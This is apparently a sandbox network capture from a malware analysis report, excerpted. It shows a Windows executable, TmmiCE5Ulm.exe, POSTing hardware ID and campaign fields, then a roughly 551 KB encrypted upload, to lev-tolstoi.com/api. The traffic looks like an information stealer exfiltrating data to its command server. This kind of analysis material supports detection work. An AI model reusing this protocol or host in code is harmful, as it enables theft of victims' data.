                                                                                                                                                                                                                                                                        2024-12-23 06:26:34 UTC15331OUTData Raw: 2d 2d 49 37 31 55 36 39 44 39 32 35 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 37 31 55 36 39 44 39 32 35 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 37 31 55 36 39 44 39 32 35 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 49 37 31 55 36 39 44 39
                                                                                                                                                                                                                                                                        Data Ascii: --I71U69D925SIContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--I71U69D925SIContent-Disposition: form-data; name="pid"3--I71U69D925SIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--I71U69D9
                                                                                                                                                                                                                                                                        2024-12-23 06:26:34 UTC5206OUTData Raw: ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: Wun 4F([:7s~X`nO`i
                                                                                                                                                                                                                                                                        2024-12-23 06:26:35 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:35 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=fcshrdgseb8ep3hd3tnnbl63ta; expires=Fri, 18 Apr 2025 00:13:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wf4v1FqRxXOy2VtkF0odjrzCdlfQgH10mNN9aIRzwQss6rqHCzazqH%2BlfPDYMLUiOgNKxkr88La10eO8NFqxHUSE%2Ffcm57FQsj9ZSzNIriApAOTrsQvDMrxg5wsbdkKvUiw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647e8dfb61a3c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1799&rtt_var=685&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21492&delivery_rate=1585233&cwnd=229&unsent_bytes=0&cid=cbb15407b0c0309e&ts=983&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 06:26:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.549713104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:37 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=HZ3IPPG7Q7N
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1223
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:37 UTC1223OUTData Raw: 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e
                                                                                                                                                                                                                                                                        Data Ascii: --HZ3IPPG7Q7NContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--HZ3IPPG7Q7NContent-Disposition: form-data; name="pid"1--HZ3IPPG7Q7NContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HZ3IPPG7Q7N
                                                                                                                                                                                                                                                                        2024-12-23 06:26:38 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:38 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=brdtc12ufm35bdil75qr93mf3i; expires=Fri, 18 Apr 2025 00:13:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZrDtL4weda5jhDcrnD%2F4vrZKX%2FPyxnda2qj3QNRSu%2FolGdYoWnfFv0l9%2FrV67tbk4EDuLlmcmtDRH5t5lKPMUqUhtSwJZR6B%2BvVNoeumxCnxRGKf5jrQvUrJ1pBkmKfGq%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647f91d458c95-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1797&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2132&delivery_rate=1595628&cwnd=204&unsent_bytes=0&cid=81a580ab9837ae43&ts=785&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 06:26:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.549716104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=H8XL4F3YH8PVAL
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 551287
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 38
                                                                                                                                                                                                                                                                        Data Ascii: --H8XL4F3YH8PVALContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--H8XL4F3YH8PVALContent-Disposition: form-data; name="pid"1--H8XL4F3YH8PVALContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--H8
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: e3 ed 40 00 7e a3 19 8e ee 56 5a 56 47 38 fc f6 1e 66 b0 5e a7 37 75 6a 89 4d 3c 39 34 1c 71 0e 7d dc 90 71 05 84 81 08 19 70 a1 ad 31 27 bf 05 d9 f1 10 5e 12 fd be 1b 3c 71 27 b2 67 87 82 47 3e 1b 7d 7b 39 2d f4 ec f2 64 71 af 6a 8f 65 32 cf 34 45 a9 d8 b0 f2 a3 59 83 d2 01 fc 62 bb 2e dd 10 da 02 e7 1a 2b 7a 99 68 0c c7 7c c2 c6 99 52 d1 4c 3c e6 17 82 99 4b 4c 30 67 9b d4 b2 de 07 69 b6 86 91 1f 91 67 47 8c de 7f 63 c5 f1 25 67 bc 31 14 65 d8 17 27 89 78 41 20 6d df 5a c7 2f c2 81 61 61 2c 2f 98 0e 60 c2 81 0a eb 3f d4 69 4d 08 da cc 43 21 b4 a5 e4 9d c6 43 e3 bb 3a e4 e1 1a 74 f2 a7 69 b5 5c 97 b7 d8 1a 65 da 05 46 4b 20 c0 15 dc b9 49 bc 0f 73 8c 7a 6e 79 89 a3 4b 28 87 55 1f 1d 85 5f 8d 24 02 62 11 b4 2a 2f b3 b8 1b e7 81 06 f2 9b 5f 31 ce 7f 7e aa
                                                                                                                                                                                                                                                                        Data Ascii: @~VZVG8f^7ujM<94q}qp1'^<q'gG>}{9-dqje24EYb.+zh|RL<KL0gigGc%g1e'xA mZ/aa,/`?iMC!C:ti\eFK IsznyK(U_$b*/_1~
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 38 17 2b ac 32 5f 17 08 e9 42 61 3c 51 f0 a4 e9 9f 82 f5 15 16 10 16 4f 8f 04 8c ae dd 74 28 c8 5b 32 ce ff 8c 89 3c b3 df 25 e4 4c 16 24 46 50 f8 d1 49 8f 0a 3b f7 6a a6 04 19 e3 82 46 41 20 e8 a4 5e 81 16 9e 24 46 99 42 c9 25 5c 96 a1 ef 84 0b 6c 81 5c 04 3c bd 14 9c 77 82 60 9a d3 5b a8 a2 a5 72 ba 83 5d d8 fa 43 61 63 b8 b7 d6 ef 50 8f ff d7 84 d0 67 d7 8e cf a2 8f 64 3a ea 51 0a 2e 72 6c b1 fd 5b c4 d6 0e de 43 87 45 68 50 9c cb 04 69 3b 0d 4f ef 06 c1 af 9f 62 58 0b 67 42 1d 05 9d 5b 8e 4f 74 6c b7 c3 20 45 04 52 e0 fe fb 86 88 f3 88 c7 7f 39 11 7e 2e f6 b6 10 44 27 6f 3d a3 28 47 ef 38 9a eb c5 fe 9e 74 2f f0 80 5d 5a 98 82 d8 33 75 39 f5 58 11 f7 be fc 16 5c 07 f7 ab a9 dd 02 5b e3 00 0e b9 7c e4 c9 27 96 e1 82 50 51 6b db 66 7a 6e d9 71 20 ce 98
                                                                                                                                                                                                                                                                        Data Ascii: 8+2_Ba<QOt([2<%L$FPI;jFA ^$FB%\l\<w`[r]CacPgd:Q.rl[CEhPi;ObXgB[Otl ER9~.D'o=(G8t/]Z3u9X\[|'PQkfznq
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: f8 7a f9 97 cb 55 ee eb fb f9 04 40 d2 26 73 3c e3 b6 b3 6a 06 aa 2a 33 9c ab dc e9 f5 bc 27 a4 7a 3f 0e d8 ed a5 e6 4e 33 de 5f 08 2b 3d af 8f ca 9b 9d b7 0f 37 35 ba f7 8e dd 50 6b c0 08 2c 74 07 59 26 3c 34 a5 ed 9b 11 f5 dc 36 1d dd a2 20 87 17 91 e6 f7 f9 82 75 60 03 14 45 0f d2 14 95 f6 65 cf 87 48 cd 89 c5 e0 94 30 ca 4a 44 e7 d6 c7 e6 94 63 21 dc 40 57 81 46 e3 88 18 1f c6 19 8c ed 91 29 39 28 8d 5b b1 93 6d a3 c5 29 e4 4c 6e a8 f2 0c 3a e6 08 ac 9e d6 12 cc 1e d5 e3 a8 8d 10 5b 59 36 40 e7 aa 93 70 84 32 77 6d 06 2f b8 b8 43 b2 27 d0 ab 99 e1 18 73 50 b3 2b e2 8f 43 9d a6 b4 7b a0 32 61 de a9 10 33 14 fd 9a 2a ad ab 6d e9 40 17 45 a1 04 ab f6 e1 57 5d 63 f4 5b 45 3a 7e f4 d6 fa 1a b9 b4 db ee 12 4c 16 a8 73 af 42 9c 2d 1d 74 22 51 5d 0d fd 6f fd
                                                                                                                                                                                                                                                                        Data Ascii: zU@&s<j*3'z?N3_+=75Pk,tY&<46 u`EeH0JDc!@WF)9([m)Ln:[Y6@p2wm/C'sP+C{2a3*m@EW]c[E:~LsB-t"Q]o
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 38 c8 5d 59 bc fd a8 a2 71 00 8e 31 f0 c5 fc 3d 8f df ae 38 e1 12 e3 53 8c 32 9f 1d 1b 71 8b 1f 75 e7 a5 57 32 c6 79 5a fc ac 80 76 70 c8 eb 37 1f 5f 8c 8b ed 96 b5 4b a5 35 19 ce d8 35 b7 df b6 23 bc e8 4b ab 7a b9 a8 8d 1b 78 e2 fe de db 8a ba a0 f5 20 94 b4 1e b3 46 97 ea 11 69 4a 3c 16 7e 40 8e 68 9d fd 4b 45 dc 7b cb 18 81 e2 0a 95 25 82 a2 5a 4d 17 66 bf 6a ea bb 36 f7 c6 54 5b f0 50 5a ff d6 d6 a9 9d 20 e3 51 be 0d c7 a2 d6 8c 5e 54 6a 1d ab 4f ff b4 da b3 c4 ae 17 ae 4f 29 f8 de fb d1 dc 22 b4 45 62 1f d0 0b 7c f1 c9 29 cc 7f 51 02 0e 54 64 75 0c a7 89 a5 16 fd 7a 3f d0 a5 27 72 ba ef 53 6f c8 2d 55 7e 0c f7 fa 21 c9 a9 15 8b 53 1c 89 b4 e2 7d 62 42 5c 60 97 32 86 a9 b0 34 b9 9f ad 7e 80 ea 98 7c a3 5c 23 99 67 ac 69 f0 c7 96 cd 7d 75 4c 87 a9 4d
                                                                                                                                                                                                                                                                        Data Ascii: 8]Yq1=8S2quW2yZvp7_K55#Kzx FiJ<~@hKE{%ZMfj6T[PZ Q^TjOO)"Eb|)QTduz?'rSo-U~!S}bB\`24~|\#gi}uLM
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 89 aa c6 39 d5 cb ae 10 09 b3 37 a3 7b 71 27 18 fe 52 45 e6 01 12 cb 0d 47 fd be 3c b2 47 80 23 76 42 02 0b af 74 96 71 79 72 e3 11 94 0d 89 27 63 f1 c4 0e 83 1b 31 fa b5 0b fc 87 38 26 fe 8e 29 55 86 85 90 05 77 86 55 56 94 66 d9 16 58 60 ae 0e c9 e6 1c 50 cc 22 25 9a 93 b5 78 17 1d 4c be d5 8c b3 74 4a c4 06 cb 64 d9 ba a3 8e 84 05 26 6f e1 5c c2 07 60 39 8a 99 d0 90 97 fd da a1 0a 91 66 bc e3 2a 80 4f df 40 ad 21 28 fb a6 c8 03 e9 2c c5 1b 32 0c 0a 81 8b 43 8c 31 9e 75 f3 af 9c 91 20 6f a6 fc c0 33 f4 3d 59 30 28 25 89 e5 eb 5f 20 f2 d3 54 45 ff 9c 13 cf 9a a1 78 6e fc fd e4 23 78 6d 1c 5f e9 e4 c1 4e af 49 10 68 2f ba e7 04 93 e3 b0 ee fa ea ed 5e 5c 93 04 e0 bb 87 74 34 d1 94 96 99 18 9f 61 fe 82 d1 f6 2c 93 61 e1 10 de e3 72 28 09 6e aa 32 d2 3f 9c
                                                                                                                                                                                                                                                                        Data Ascii: 97{q'REG<G#vBtqyr'c18&)UwUVfX`P"%xLtJd&o\`9f*O@!(,2C1u o3=Y0(%_ TExn#xm_NIh/^\t4a,ar(n2?
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 84 8b 65 2b 8e 21 1c 59 5e 4e 51 7f f8 7c d3 6f 06 f3 b1 4f 9c ad 1c e9 fb 29 7a b8 c7 2d f2 b5 1c 70 8c cf 1e f4 82 a9 a5 31 34 a1 d6 c6 a5 ec af 06 82 d0 fc 99 92 5c 60 a3 44 cc 08 99 9c bf 63 b0 3a 31 51 ea c7 10 eb f1 a8 77 88 36 45 c7 1a f4 e4 64 6d 36 23 08 e6 e4 a0 f5 1f 9e ee 71 31 0e 77 43 3c 60 58 46 ef c6 3d 0f fc fa 85 59 d2 d1 9b fc 50 19 b6 b1 d6 22 3e fb 68 1c 24 c8 bf 86 65 99 57 17 c3 a6 89 1c 47 cb ec 68 a3 a6 88 b2 e9 06 43 d4 6b 15 1b 9e eb c4 18 90 52 7e 2b e3 04 f8 b1 10 4a 7c cc a1 04 f3 48 32 86 26 83 29 f7 09 64 7d 5d f1 92 8f d2 3d 2f b8 c7 4d 75 75 5e c4 ad de a4 8a 1b 72 55 3e 1a 89 24 1f d6 80 40 56 d8 35 eb c5 b9 7d 1f ba a7 64 72 e7 06 6e 64 ed 98 5d 9b 1d 48 93 33 0d d7 5f 1f 0c a6 1b 15 30 e7 8e 73 47 69 d6 ae 2b 4f 04 fe
                                                                                                                                                                                                                                                                        Data Ascii: e+!Y^NQ|oO)z-p14\`Dc:1Qw6Edm6#q1wC<`XF=YP">h$eWGhCkR~+J|H2&)d}]=/Muu^rU>$@V5}drnd]H3_0sGi+O
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 57 fb 62 70 77 59 67 d6 9d f1 51 5f d5 15 58 fb 67 72 09 9e 32 67 3b c4 cf 2c 5a 2d 4b 8b a9 d7 a9 73 fb bf bb a8 db 42 80 bd d3 c6 93 82 30 a6 65 d7 5d dc 2c 79 84 70 f7 94 d9 08 ae 90 72 83 22 8c b0 95 b1 2f 33 81 19 1d e4 69 77 26 63 b1 a7 61 9a 21 93 1e 75 47 ef 60 0c b9 f8 15 96 ac 5d 2e a0 15 b2 df 9c 5c 4f 8f 42 cb 46 4f 0a e8 89 f5 d3 fe d7 83 78 0f 0a e0 e1 7b 10 cc 73 11 ba 48 ea 4b 88 21 36 ea b3 4b 13 f1 07 05 fa b6 0f 43 d2 c4 a9 d9 e2 50 88 65 b3 d8 50 91 fe c7 9b ae 80 58 a7 38 ab 49 e8 5c a7 a9 bd 60 64 fb 81 72 4d c6 2b b3 2a 64 40 aa 62 3a 0c 60 11 d6 ef b6 ba 97 3f 60 5f a4 27 94 c0 a0 13 b6 32 4a 79 f1 39 1a 86 10 63 b3 a4 b8 c8 74 a4 14 4c 64 3c d5 e7 f8 8a 58 f9 a2 db e4 23 ee 6e bd 65 c6 08 93 18 f4 af 23 73 49 70 47 39 da 72 8d 82
                                                                                                                                                                                                                                                                        Data Ascii: WbpwYgQ_Xgr2g;,Z-KsB0e],ypr"/3iw&ca!uG`].\OBFOx{sHK!6KCPePX8I\`drM+*d@b:`?`_'2Jy9ctLd<X#ne#sIpG9r
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: c3 63 f7 86 e3 ef 53 93 09 29 f4 82 13 c0 a6 d0 1a f7 e6 78 47 93 ee 77 17 cf 34 d1 b4 27 eb 58 ba fe ec 70 3c 8e 79 66 af 4c e7 19 11 6e f4 4c fb 83 5b 44 17 a5 e7 04 fc 5d a2 8d 5a dd 34 8f 79 77 f5 47 49 f4 6a 68 e4 1d 51 d3 c9 57 e3 b8 fe e2 b7 dd 4e 38 c0 4b e0 63 c2 8b 41 87 11 9f 24 f3 42 85 0e cd f3 0b d2 10 ae 1e 11 37 dd 6b 32 32 34 b9 51 6f 9a 09 ad 13 d0 51 41 ec 24 05 4a 40 ad e2 9b 2c fc cc 3f 8f 85 64 27 6d 64 be c5 f3 fc 0b 6e 54 ee f0 81 a5 32 ca ce 3c d1 bf fd 7d da 16 19 52 11 64 8f ac 36 fe 06 49 bf a2 bb 55 39 7c 52 d3 45 75 16 f3 f1 99 2a f3 a6 c1 9b 5e 42 97 cd 79 69 85 f9 cc 5a bd 59 ef ba 12 0f 51 a8 4e 00 44 cf 07 5c 2c 48 6e 23 5a 9a 06 af 77 8e f0 88 63 88 a6 cc c9 90 cc 36 c1 9f 57 45 e3 28 72 68 e1 14 9d 64 26 62 e0 c2 ef 02
                                                                                                                                                                                                                                                                        Data Ascii: cS)xGw4'Xp<yfLnL[D]Z4ywGIjhQWN8KcA$B7k224QoQA$J@,?d'mdnT2<}Rd6IU9|REu*^ByiZYQND\,Hn#Zwc6WE(rhd&b
                                                                                                                                                                                                                                                                        2024-12-23 06:26:39 UTC15331OUTData Raw: 96 24 c0 c7 bf 31 f7 3c 01 f1 59 ad d1 33 59 21 e1 ad 04 49 6a cd 49 71 9d de df 93 f1 13 e9 7f 07 2e 70 bf 94 e9 72 7d 27 cc 4a 72 03 7d c3 70 cc 57 94 cc ef c8 4a 42 3c 7c e7 a9 0a ad 78 81 7d 8b 95 b3 59 10 68 1e ce e8 9a 6f aa 30 9d 89 dc 98 9f 18 d8 b7 70 a3 c7 9d 95 da 5e ea 59 b9 fc 18 20 28 f3 2a 84 74 d8 7c e3 4e d3 c0 30 77 3d 66 de 98 3b 11 30 18 60 e7 31 3b 90 c1 4d 0e 9c 31 41 55 4e 64 28 61 6e 80 d0 e1 30 13 41 f6 2e 11 9e c2 cb ac a0 88 d4 ac 41 8c 9e fd 61 a1 38 66 24 a3 19 19 bf 0a d1 84 01 70 7c ef 32 36 44 07 64 3f 3e b6 f1 6a 8d b9 3b 1c 46 d1 5b 50 09 e9 d9 d7 5e 9e c9 9d 7f 08 d6 eb ba 67 f2 32 4d c5 d7 42 e7 07 53 cd 5c a6 39 77 00 79 7e 40 71 0f 62 00 0b 77 b9 ce 81 33 05 4f e6 2f d5 7e 7e 28 74 4a fb 77 5a c7 dd 53 88 1f 97 76 d8
                                                                                                                                                                                                                                                                        Data Ascii: $1<Y3Y!IjIq.pr}'Jr}pWJB<|x}Yho0p^Y (*t|N0w=f;0`1;M1AUNd(an0A.Aa8f$p|26Dd?>j;F[P^g2MBS\9wy~@qbw3O/~~(tJwZSv
                                                                                                                                                                                                                                                                        2024-12-23 06:26:44 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=1b6dh8fh07kb9vbd4b8vq6ten9; expires=Fri, 18 Apr 2025 00:13:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoFIjWC4QThWitR%2BxAR%2FX0xqSwjQLOhBtvHBAFWO9cokHTbWhg4LUiVwYZNHjapoURUg%2BGdURWQRdEBelpi5AKoyqTLi2xo4H%2FkINi4Sd4AP7TqukGcq23UozNmTjkwdnDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f664808ba1e41bb-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1722&rtt_var=653&sent=194&recv=569&lost=0&retrans=0&sent_bytes=2835&recv_bytes=553763&delivery_rate=1664766&cwnd=205&unsent_bytes=0&cid=884f66ccf0028a51&ts=4264&x=0"


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.549733104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:45 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 88
